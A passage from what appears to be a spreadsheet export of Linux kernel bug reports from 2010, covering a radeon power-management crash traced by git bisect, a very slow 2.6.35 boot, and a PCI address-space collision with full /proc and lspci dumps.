[&lt;ffffffff8128778b&gt;] ? drm_framebuffer_cleanup+0x55/0xd7 Aug 2 09:52:38 zeus kernel: [&lt;ffffffff81288505&gt;] ? drm_mode_rmfb+0x0/0xe4 Aug 2 09:52:38 zeus kernel: [&lt;ffffffff812c38b1&gt;] ? radeon_user_framebuffer_destroy+0x21/0x2a Aug 2 09:52:38 zeus kernel: [&lt;ffffffff812885d4&gt;] ? drm_mode_rmfb+0xcf/0xe4 Aug 2 09:52:38 zeus kernel: [&lt;ffffffff8127e70c&gt;] ? drm_ioctl+0x21a/0x300 Aug 2 09:52:38 zeus kernel: [&lt;ffffffff810a4d1c&gt;] ? unmap_region+0x103/0x144 Aug 2 09:52:38 zeus kernel: [&lt;ffffffff810c9cae&gt;] ? vfs_ioctl+0x23/0x93 Aug 2 09:52:38 zeus kernel: [&lt;ffffffff810ca202&gt;] ? do_vfs_ioctl+0x461/0x49b Aug 2 09:52:38 zeus kernel: [&lt;ffffffff810ca278&gt;] ? sys_ioctl+0x3c/0x5e Aug 2 09:52:38 zeus kernel: [&lt;ffffffff81021dab&gt;] ? system_call_fastpath+0x16/0x1b Aug 2 09:52:38 zeus kernel: Code: 40 76 18 89 c0 8b 74 24 04 48 c1 e0 0d 31 d2 48 f7 f6 48 8d 48 01 48 d1 e9 eb 04 8b 4c 24 04 89 c9 31 d2 8b 44 24 24 48 c1 e0 0d &lt;48&gt; f7 f1 8b 54 24 0c 48 8d 48 01 8b 44 24 10 48 d1 e9 89 c6 39 Aug 2 09:52:38 zeus kernel: RIP [&lt;ffffffff812e2ca4&gt;] rv515_bandwidth_avivo_update+0x450/0x5b9 Aug 2 09:52:38 zeus kernel: RSP &lt;ffff88007a5f3ae8&gt; Aug 2 09:52:38 zeus kernel: ---[ end trace d58e56ed7c958880 ]--- And in the Xorg log we have Fatal server error: xf86OpenConsole: VT_WAITACTIVE failed: Interrupted system call A git bisect shows the following as the culprit ce8f53709bf440100cb9d31b1303291551cf517f is the first bad commit commit ce8f53709bf440100cb9d31b1303291551cf517f Author: Alex Deucher &lt;alexdeucher@gmail.com&gt; Date: Fri May 7 15:10:16 2010 -0400 drm/radeon/kms/pm: rework power management - Separate dynpm and profile based power management methods. You can select the pm method by echoing the selected method ("dynpm" or "profile") to power_method in sysfs. - Expose basic 4 profile in profile method "default" - default clocks "auto" - select between low and high based on ac/dc state "low" - DC, low power mode "high" - AC, performance mode The current base profile is "default", but it should switched to "auto" once we've tested on more systems. Switching the state is a matter of echoing the requested profile to power_profile in sysfs. The lowest power states are selected automatically when dpms turns the monitors off in all states but default. - Remove dynamic fence-based reclocking for the moment. We can revisit this later once we have basic pm in. - Move pm init/fini to modesetting path. pm is tightly coupled with display state. Make sure display side is initialized before pm. - Add pm suspend/resume functions to make sure pm state is properly reinitialized on resume. - Remove dynpm module option. It's now selectable via sysfs. Signed-off-by: Alex Deucher &lt;alexdeucher@gmail.com&gt; Signed-off-by: Dave Airlie &lt;airlied@redhat.com&gt; :040000 040000 fa3acba12b9886453c2de619577ae633abfc97bc faf940f2c2791f1382ed1abbfa54e22df7e1c936 M drivers Unfortunately that doesn't seem to revert cleanly, so can't actually test it... $ git revert ce8f53709bf440100cb9d31b1303291551cf517f warning: too many files (created: 1221 deleted: 217), skipping inexact rename detection Automatic revert failed. After resolving the conflicts, mark the corrected paths with 'git add &lt;paths&gt;' or 'git rm &lt;paths&gt;' and commit the result. I'm stuck at that point. Cheers, Andrew</t>
  </si>
  <si>
    <t>Kernel 2.6.35 takes almost half an hour to boot</t>
  </si>
  <si>
    <t>2.6.35.2</t>
  </si>
  <si>
    <t>2010-08-02 17:16 UTC</t>
  </si>
  <si>
    <t>2010-09-21 18:10 UTC</t>
  </si>
  <si>
    <t>Created attachment 27323 [details] .config for 2.6.35 (exactly the same as my working 2.6.34.1) I just compiled the brand new 2.6.35. I have a Vaio SR11M with an Intel processor Core 2 Duo Penryn P8400. When I booted my system, it took about half an hour to reach the console login (getty). At boot, the whole system is stuck (no cursor blinking anymore, although I can press CapsLocks and the led will light up). It takes about 5 minutes for udev scripts to run. After about 7 minutes, the kernel reports that it was unable to load the iwlwifi-5000-ucode firmware (this is probably another bug, but wifi worked perfectly with 2.6.34.1). Still, after this the boot process continues but very very slowly. Every line appears every 2 or 3 minutes, and it seems that the kernel is doing something. After waiting for almost half an hour, the system finally boots, I can see the display manager, but in console 0 (in text mode). Again (although this should be another topic) I can see ioctl errors about wlan0, my wireless device is not recognized. I use Debian Sid (up to date), kernel 2.6.35 vanilla with the same options as 2.6.34.1 (which works perfectly in the exact same environment). My system is 64-bits (Debian amd64). Any clues why 2.6.35 boots so extremely slowly? Please find enclosed my .config-2.6.35. --Claudio</t>
  </si>
  <si>
    <t>Address space collision: host bridge window conflicts with Video ROM</t>
  </si>
  <si>
    <t>2010-08-03 05:38 UTC</t>
  </si>
  <si>
    <t>MM</t>
  </si>
  <si>
    <t>2012-06-13 14:57 UTC</t>
  </si>
  <si>
    <t>1. /var/log/dmesg reports: pci_root PNP0A08:00: address space collision: host bridge window [mem 0x000cc000-0x000cffff] conflicts with Video ROM [mem 0x000c0000-0x000ce9ff] 2. System - Slackware 13.1 x86 3. cat /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 15 model : 124 model name : AMD Athlon(tm) Processor TF-20 stepping : 2 cpu MHz : 800.000 cache size : 512 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt rdtscp lm 3dnowext 3dnow up extd_apicid pni cx16 lahf_lm svm extapic cr8_legacy 3dnowprefetch lbrv bogomips : 1595.72 clflush size : 64 cache_alignment : 64 address sizes : 40 bits physical, 48 bits virtual power management: ts fid vid ttp tm stc 100mhzsteps 4. /proc/version Linux version 2.6.35-smp (root@slackware) (gcc version 4.4.4 (GCC) ) #1 SMP PREEMPT Mon Aug 2 17:54:11 HST 2010 5. cat /proc/modules ipv6 222220 10 - Live 0xf91a1000 snd_seq_dummy 1119 0 - Live 0xf914d000 snd_seq_oss 25706 0 - Live 0xf913b000 snd_seq_midi_event 4664 1 snd_seq_oss, Live 0xf9128000 snd_seq 42999 5 snd_seq_dummy,snd_seq_oss,snd_seq_midi_event, Live 0xf9110000 snd_seq_device 4523 3 snd_seq_dummy,snd_seq_oss,snd_seq, Live 0xf90f7000 snd_pcm_oss 31885 0 - Live 0xf90e4000 snd_mixer_oss 13457 1 snd_pcm_oss, Live 0xf90ce000 cpufreq_ondemand 7378 1 - Live 0xf90be000 powernow_k8 11922 0 - Live 0xf90b0000 freq_table 2039 2 cpufreq_ondemand,powernow_k8, Live 0xf9097000 mperf 923 1 powernow_k8, Live 0xf908d000 fuse 55342 3 - Live 0xf9076000 snd_hda_codec_realtek 189992 1 - Live 0xf8f7e000 snd_hda_intel 17692 0 - Live 0xf8f20000 ecb 1629 2 - Live 0xf8efd000 ath9k 70339 0 - Live 0xf8edf000 snd_hda_codec 58524 2 snd_hda_codec_realtek,snd_hda_intel, Live 0xf8eae000 ath9k_common 4298 1 ath9k, Live 0xf8e59000 ath9k_hw 272581 2 ath9k,ath9k_common, Live 0xf8e06000 usbhid 24402 0 - Live 0xf8d96000 hid 61343 1 usbhid, Live 0xf8d74000 ath 6768 2 ath9k,ath9k_hw, Live 0xf8d25000 snd_hwdep 5200 1 snd_hda_codec, Live 0xf8d19000 mac80211 147139 2 ath9k,ath9k_common, Live 0xf8ce4000 rtc_cmos 8062 0 - Live 0xf8caa000 snd_pcm 53102 3 snd_pcm_oss,snd_hda_intel,snd_hda_codec, Live 0xf8c8e000 thermal 10430 0 - Live 0xf8c6f000 rtc_core 12446 1 rtc_cmos, Live 0xf8c5d000 snd_timer 15939 2 snd_seq,snd_pcm, Live 0xf8c4b000 cfg80211 123101 4 ath9k,ath9k_common,ath,mac80211, Live 0xf874b000 ohci_hcd 19937 0 - Live 0xf8bd9000 processor 25390 1 powernow_k8, Live 0xf8bc1000 rtc_lib 1566 1 rtc_core, Live 0xf83e6000 ehci_hcd 32509 0 - Live 0xf8120000 battery 8372 0 - Live 0xf83b0000 ac 2467 0 - Live 0xf83a7000 led_class 1915 1 ath9k, Live 0xf80d5000 atl1c 28319 0 - Live 0xf8378000 thermal_sys 12032 2 thermal,processor, Live 0xf833c000 button 4010 0 - Live 0xf8110000 snd 43178 11 snd_seq_oss,snd_seq,snd_seq_device,snd_pcm_oss,snd_mixer_oss,snd_hda_codec_realtek,snd_hda_intel,snd_hda_codec,snd_hwdep,snd_pcm,snd_timer, Live 0xf80ef000 sg 21185 0 - Live 0xf80c5000 sr_mod 12375 0 - Live 0xf809c000 k8temp 2703 0 - Live 0xf808f000 evdev 7099 10 - Live 0xf8084000 serio_raw 3766 0 - Live 0xf8078000 hwmon 1129 2 thermal_sys,k8temp, Live 0xf806d000 cdrom 31256 1 sr_mod, Live 0xf805b000 soundcore 5181 1 snd, Live 0xf8047000 snd_page_alloc 6053 2 snd_hda_intel,snd_pcm, Live 0xf8021000 6. /proc/ioports 0000-0cf7 : PCI Bus 0000:00 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-0060 : keyboard 0064-0064 : keyboard 0070-0071 : rtc0 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 03c0-03df : vga+ 0400-04cf : pnp 00:08 0400-0403 : ACPI PM1a_EVT_BLK 0404-0405 : ACPI PM1a_CNT_BLK 0408-040b : ACPI PM_TMR 0410-0415 : ACPI CPU throttle 0420-0427 : ACPI GPE0_BLK 04d0-04d1 : pnp 00:08 04d6-04d6 : pnp 00:08 0680-06ff : pnp 00:08 077a-077a : pnp 00:08 0900-0900 : ACPI PM2_CNT_BLK 0c00-0c01 : pnp 00:08 0c14-0c14 : pnp 00:08 0c50-0c52 : pnp 00:08 0c6c-0c6c : pnp 00:08 0c6f-0c6f : pnp 00:08 0cd0-0cdb : pnp 00:08 0cf8-0cff : PCI conf1 0d00-ffff : PCI Bus 0000:00 1000-1fff : PCI Bus 0000:09 2000-2fff : PCI Bus 0000:08 2000-207f : 0000:08:00.0 2000-207f : atl1c 3000-6fff : PCI Bus 0000:02 7000-7fff : PCI Bus 0000:01 7000-70ff : 0000:01:05.0 8010-801f : 0000:00:11.0 8010-801f : ahci 8030-8037 : 0000:00:11.0 8030-8037 : ahci 8038-803f : 0000:00:11.0 8038-803f : ahci 8048-804b : 0000:00:11.0 8048-804b : ahci 804c-804f : 0000:00:11.0 804c-804f : ahci fd60-fd63 : pnp 00:08 7. /proc/iomem 00000000-00000fff : reserved 00001000-0009fbff : System RAM 0009fc00-0009ffff : reserved 000a0000-000bffff : PCI Bus 0000:00 000a0000-000bffff : Video RAM area 000c0000-000ce9ff : Video ROM 000c0000-000c3fff : PCI Bus 0000:00 000c4000-000c7fff : PCI Bus 0000:00 000c8000-000cbfff : PCI Bus 0000:00 000cf000-000cffff : Adapter ROM 000d0000-000d3fff : PCI Bus 0000:00 000d4000-000d7fff : PCI Bus 0000:00 000d8000-000dbfff : PCI Bus 0000:00 000dc000-000dffff : PCI Bus 0000:00 000e0000-000fffff : reserved 000e0000-000e3fff : PCI Bus 0000:00 000e4000-000e7fff : PCI Bus 0000:00 000e8000-000ebfff : PCI Bus 0000:00 000ec000-000effff : PCI Bus 0000:00 000f0000-000fffff : System ROM 00100000-de60bfff : System RAM 01000000-013c1664 : Kernel code 013c1665-015416c7 : Kernel data 015b1000-01605a23 : Kernel bss de60c000-de80bfff : ACPI Non-volatile Storage de80c000-dfd6ffff : System RAM dfd70000-dfdbefff : reserved dfdbf000-dfe91fff : System RAM dfe92000-dfebefff : ACPI Non-volatile Storage dfebf000-dfee1fff : System RAM dfee2000-dfef6fff : ACPI Tables dfef7000-dfefffff : System RAM dff00000-dfffffff : RAM buffer e0000000-f6ffffff : PCI Bus 0000:00 e0000000-efffffff : PCI Bus 0000:01 e0000000-efffffff : 0000:01:05.0 f0000000-f0ffffff : PCI Bus 0000:02 f1000000-f10fffff : PCI Bus 0000:08 f1000000-f103ffff : 0000:08:00.0 f1000000-f103ffff : atl1c f1100000-f20fffff : PCI Bus 0000:02 f1100000-f110ffff : 0000:02:00.0 f1100000-f110ffff : ath9k f2100000-f22fffff : PCI Bus 0000:01 f2100000-f21fffff : 0000:01:05.0 f2200000-f220ffff : 0000:01:05.0 f2300000-f2303fff : 0000:00:14.2 f2300000-f2303fff : ICH HD audio f2304000-f2304fff : 0000:00:12.1 f2304000-f2304fff : ohci_hcd f2305000-f2305fff : 0000:00:12.0 f2305000-f2305fff : ohci_hcd f2306000-f23063ff : 0000:00:11.0 f2306000-f23063ff : ahci f2306400-f23064ff : 0000:00:12.2 f2306400-f23064ff : ehci_hcd f7000000-f7ffffff : PCI MMCONFIG 0000 [bus 00-0f] f7000000-f7ffffff : reserved f7000000-f7ffffff : pnp 00:01 f8000000-ffffffff : PCI Bus 0000:00 feb00000-feb00fff : reserved fec00000-fec00fff : reserved fec00000-fec003ff : IOAPIC 0 fed00000-fed003ff : HPET 0 fee00000-fee00fff : Local APIC fee00000-fee00fff : reserved fee00000-fee00fff : pnp 00:01 fff00000-ffffffff : reserved fff00000-ffffffff : pnp 00:09 8. lspci -vvv 00:00.0 Host bridge: Advanced Micro Devices [AMD] RS780 Host Bridge Subsystem: Acer Incorporated [ALI] Device 028d Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [c4] HyperTransport: Slave or Primary Interface Command: BaseUnitID=1 UnitCnt=12 MastHost- DefDir- DUL- Link Control 0: CFlE- CST- CFE- &lt;LkFail- Init+ EOC- TXO- &lt;CRCErr=0 IsocEn- LSEn+ ExtCTL- 64b- Link Config 0: MLWI=16bit DwFcIn- MLWO=16bit DwFcOut- LWI=16bit DwFcInEn- LWO=16bit DwFcOutEn- Link Control 1: CFlE- CST- CFE- &lt;LkFail+ Init- EOC+ TXO+ &lt;CRCErr=0 IsocEn- LSEn- ExtCTL- 64b- Link Config 1: MLWI=8bit DwFcIn- MLWO=8bit DwFcOut- LWI=8bit DwFcInEn- LWO=8bit DwFcOutEn- Revision ID: 3.00 Link Frequency 0: 800MHz Link Error 0: &lt;Prot- &lt;Ovfl- &lt;EOC- CTLTm- Link Frequency Capability 0: 200MHz+ 300MHz- 400MHz+ 500MHz- 600MHz+ 800MHz+ 1.0GHz+ 1.2GHz- 1.4GHz- 1.6GHz- Vend- Feature Capability: IsocFC- LDTSTOP+ CRCTM- ECTLT- 64bA- UIDRD- Link Frequency 1: 200MHz Link Error 1: &lt;Prot- &lt;Ovfl- &lt;EOC- CTLTm- Link Frequency Capability 1: 200MHz- 300MHz- 400MHz- 500MHz- 600MHz- 800MHz- 1.0GHz- 1.2GHz- 1.4GHz- 1.6GHz- Vend- Error Handling: PFlE- OFlE- PFE- OFE- EOCFE- RFE- CRCFE- SERRFE- CF- RE- PNFE- ONFE- EOCNFE- RNFE- CRCNFE- SERRNFE- Prefetchable memory behind bridge Upper: 00-00 Bus Number: 00 Capabilities: [54] HyperTransport: UnitID Clumping Capabilities: [40] HyperTransport: Retry Mode Capabilities: [9c] HyperTransport: #1a Capabilities: [f8] HyperTransport: #1c 00:01.0 PCI bridge: Advanced Micro Devices [AMD] RS780 PCI to PCI bridge (int gfx) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 00007000-00007fff Memory behind bridge: f2100000-f22fffff Prefetchable memory behind bridge: 00000000e0000000-00000000efffffff Secondary status: 66MHz+ FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA+ MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [44] HyperTransport: MSI Mapping Enable+ Fixed+ Capabilities: [b0] Subsystem: Advanced Micro Devices [AMD] RS780 PCI to PCI bridge (int gfx) 00:04.0 PCI bridge: Advanced Micro Devices [AMD] RS780 PCI to PCI bridge (PCIE port 0) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=02, subordinate=07, sec-latency=0 I/O behind bridge: 00003000-00006fff Memory behind bridge: f1100000-f20fffff Prefetchable memory behind bridge: 00000000f0000000-00000000f0ffffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Express (v2) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag+ RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #1, Speed 5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Surprise- LLActRep+ BwNot+ LnkCtl: ASPM L1 Enabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt+ ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surprise+ Slot # 4, PowerLimit 25.000000; Interlock- NoCompl+ SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet+ LinkState+ RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- DevCap2: Completion Timeout: Not Supported, TimeoutDis- ARIFwd- DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis- ARIFwd- LnkCtl2: Target Link Speed: 2.5GT/s, EnterCompliance- SpeedDis-, Selectable De-emphasis: -6dB Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -6dB Capabilities: [a0] MSI: Enable- Count=1/1 Maskable- 64bit- Address: 00000000 Data: 0000 Capabilities: [b0] Subsystem: Acer Incorporated [ALI] Device 028d Capabilities: [b8] HyperTransport: MSI Mapping Enable+ Fixed+ Capabilities: [100] Vendor Specific Information &lt;?&gt; Capabilities: [110] Virtual Channel &lt;?&gt; 00:05.0 PCI bridge: Advanced Micro Devices [AMD] RS780 PCI to PCI bridge (PCIE port 1) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=08, subordinate=08, sec-latency=0 I/O behind bridge: 00002000-00002fff Memory behind bridge: f1000000-f10fffff Prefetchable memory behind bridge: 00000000fff00000-00000000000fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Express (v2) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag+ RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #2, Speed 5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Surprise- LLActRep+ BwNot+ LnkCtl: ASPM L1 Enabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt+ ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surprise- Slot # 5, PowerLimit 25.000000; Interlock- NoCompl+ SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet+ LinkState+ RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- DevCap2: Completion Timeout: Not Supported, TimeoutDis- ARIFwd- DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis- ARIFwd- LnkCtl2: Target Link Speed: 2.5GT/s, EnterCompliance- SpeedDis-, Selectable De-emphasis: -6dB Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -6dB Capabilities: [a0] MSI: Enable- Count=1/1 Maskable- 64bit- Address: 00000000 Data: 0000 Capabilities: [b0] Subsystem: Acer Incorporated [ALI] Device 028d Capabilities: [b8] HyperTransport: MSI Mapping Enable+ Fixed+ Capabilities: [100] Vendor Specific Information &lt;?&gt; Capabilities: [110] Virtual Channel &lt;?&gt; 00:11.0 SATA controller: ATI Technologies Inc SB700/SB800 SATA Controller [AHCI mode] (prog-if 01 [AHCI 1.0]) Subsystem: Acer Incorporated [ALI] Device 028d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 22 Region 0: I/O ports at 8038 [size=8] Region 1: I/O ports at 804c [size=4] Region 2: I/O ports at 8030 [size=8] Region 3: I/O ports at 8048 [size=4] Region 4: I/O ports at 8010 [size=16] Region 5: Memory at f2306000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] MSI: Enable- Count=1/8 Maskable- 64bit+ Address: 0000000000000000 Data: 0000 Capabilities: [70] SATA HBA &lt;?&gt; Kernel driver in use: ahci 00:12.0 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI0 Controller (prog-if 10 [OHCI]) Subsystem: Acer Incorporated [ALI] Device 028d Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 16 Region 0: Memory at f2305000 (32-bit, non-prefetchable) [size=4K] Kernel driver in use: ohci_hcd Kernel modules: ohci-hcd 00:12.1 USB Controller: ATI Technologies Inc SB700 USB OHCI1 Controller (prog-if 10 [OHCI]) Subsystem: Acer Incorporated [ALI] Device 028d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 16 Region 0: Memory at f2304000 (32-bit, non-prefetchable) [size=4K] Kernel driver in use: ohci_hcd Kernel modules: ohci-hcd 00:12.2 USB Controller: ATI Technologies Inc SB700/SB800 USB EHCI Controller (prog-if 20 [EHCI]) Subsystem: Acer Incorporated [ALI] Device 028d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 17 Region 0: Memory at f2306400 (32-bit, non-prefetchable) [size=256] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Bridge: PM- B3+ Capabilities: [e4] Debug port: BAR=1 offset=00e0 Kernel driver in use: ehci_hcd Kernel modules: ehci-hcd 00:14.0 SMBus: ATI Technologies Inc SBx00 SMBus Controller (rev 3c) Subsystem: Acer Incorporated [ALI] Device 028d Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort+ &lt;MAbort- &gt;SERR+ &lt;PERR+ INTx- Capabilities: [b0] HyperTransport: MSI Mapping Enable- Fixed+ 00:14.2 Audio device: ATI Technologies Inc SBx00 Azalia (Intel HDA) Subsystem: Acer Incorporated [ALI] Device 028d Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=slow &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin ? routed to IRQ 16 Region 0: Memory at f2300000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: HDA Intel Kernel modules: snd-hda-intel 00:14.3 ISA bridge: ATI Technologies Inc SB700/SB800 LPC host controller Subsystem: Acer Incorporated [ALI] Device 028d Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:14.4 PCI bridge: ATI Technologies Inc SBx00 PCI to PCI Bridge (prog-if 01 [Subtractive decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 Bus: primary=00, secondary=09, subordinate=09, sec-latency=64 I/O behind bridge: 00001000-00001fff Memory behind bridge: fff00000-000fffff Prefetchable memory behind bridge: fff00000-000fffff Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- 00:18.0 Host bridge: Advanced Micro 